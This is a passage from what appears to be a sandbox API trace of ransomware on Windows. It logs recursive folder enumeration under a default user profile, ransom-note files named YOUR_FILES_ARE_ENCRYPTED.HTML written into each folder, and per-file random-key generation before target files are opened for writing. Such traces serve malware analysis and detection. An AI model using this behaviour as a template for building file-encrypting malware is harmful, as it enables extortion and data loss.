lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.248] CloseHandle (hObject=0x5a0) returned 1 [0171.249] GetProcessHeap () returned 0x270000 [0171.249] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.249] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0171.250] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads") returned 30 [0171.250] GetProcessHeap () returned 0x270000 [0171.250] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.250] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads") returned="\\\\?\\C:\\Users\\Default\\Downloads" [0171.250] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Downloads", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\*") returned="\\\\?\\C:\\Users\\Default\\Downloads\\*" [0171.250] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.250] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.250] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.250] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0171.250] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.250] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.250] lstrlenW (lpString=".ini") returned 4 [0171.250] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.250] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.251] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.251] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 60 [0171.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\downloads\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.251] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.254] CloseHandle (hObject=0x5a0) returned 1 [0171.254] GetProcessHeap () returned 0x270000 [0171.255] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.255] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0171.255] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites") returned 30 [0171.255] GetProcessHeap () returned 0x270000 [0171.255] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.255] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites") returned="\\\\?\\C:\\Users\\Default\\Favorites" [0171.255] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\*" [0171.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.258] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.258] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.259] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0171.259] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.259] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.259] lstrlenW (lpString=".ini") returned 4 [0171.259] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.259] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acb9862, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Links", cAlternateFileName="")) returned 1 [0171.259] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links") returned 36 [0171.259] GetProcessHeap () returned 0x270000 [0171.259] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.259] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links" [0171.259] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*" [0171.259] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acb9862, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.259] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acb9862, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.259] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ac93702, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.259] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0171.259] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.259] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.259] lstrlenW (lpString=".ini") returned 4 [0171.259] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.260] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad77f44, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0171.260] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0171.260] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.260] PathFindExtensionW (pszPath="Web Slice Gallery.url") returned=".url" [0171.260] lstrlenW (lpString=".url") returned 4 [0171.260] PathFindExtensionW (pszPath="Web Slice Gallery.url") returned=".url" [0171.260] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.260] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=226) returned 1 [0171.260] CloseHandle (hObject=0x600) returned 1 [0171.260] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad77f44, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0171.260] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.260] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0171.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\favorites\\links\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.261] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.263] CloseHandle (hObject=0x5f8) returned 1 [0171.263] GetProcessHeap () returned 0x270000 [0171.264] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.264] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0171.264] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites") returned 49 [0171.264] GetProcessHeap () returned 0x270000 [0171.264] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.264] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites" [0171.264] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*" [0171.264] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.298] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.304] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a30def0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0171.304] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0171.304] lstrcmpW (lpString1="IE Add-on site.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.304] PathFindExtensionW (pszPath="IE Add-on site.url") returned=".url" [0171.304] lstrlenW (lpString=".url") returned 4 [0171.304] PathFindExtensionW (pszPath="IE Add-on site.url") returned=".url" [0171.304] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.305] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.305] CloseHandle (hObject=0x600) returned 1 [0171.305] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a2e7d90, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0171.305] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0171.305] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.305] PathFindExtensionW (pszPath="IE site on Microsoft.com.url") returned=".url" [0171.305] lstrlenW (lpString=".url") returned 4 [0171.305] PathFindExtensionW (pszPath="IE site on Microsoft.com.url") returned=".url" [0171.305] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.306] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.306] CloseHandle (hObject=0x600) returned 1 [0171.306] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a30def0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0171.306] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0171.306] lstrcmpW (lpString1="Microsoft At Home.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.306] PathFindExtensionW (pszPath="Microsoft At Home.url") returned=".url" [0171.306] lstrlenW (lpString=".url") returned 4 [0171.306] PathFindExtensionW (pszPath="Microsoft At Home.url") returned=".url" [0171.306] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.307] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.307] CloseHandle (hObject=0x600) returned 1 [0171.307] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a30def0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0171.307] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0171.307] lstrcmpW (lpString1="Microsoft At Work.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.307] PathFindExtensionW (pszPath="Microsoft At Work.url") returned=".url" [0171.307] lstrlenW (lpString=".url") returned 4 [0171.307] PathFindExtensionW (pszPath="Microsoft At Work.url") returned=".url" [0171.307] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.307] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.307] CloseHandle (hObject=0x600) returned 1 [0171.307] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0171.307] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0171.307] lstrcmpW (lpString1="Microsoft Store.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.307] PathFindExtensionW (pszPath="Microsoft Store.url") returned=".url" [0171.307] lstrlenW (lpString=".url") returned 4 [0171.308] PathFindExtensionW (pszPath="Microsoft Store.url") returned=".url" [0171.308] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: 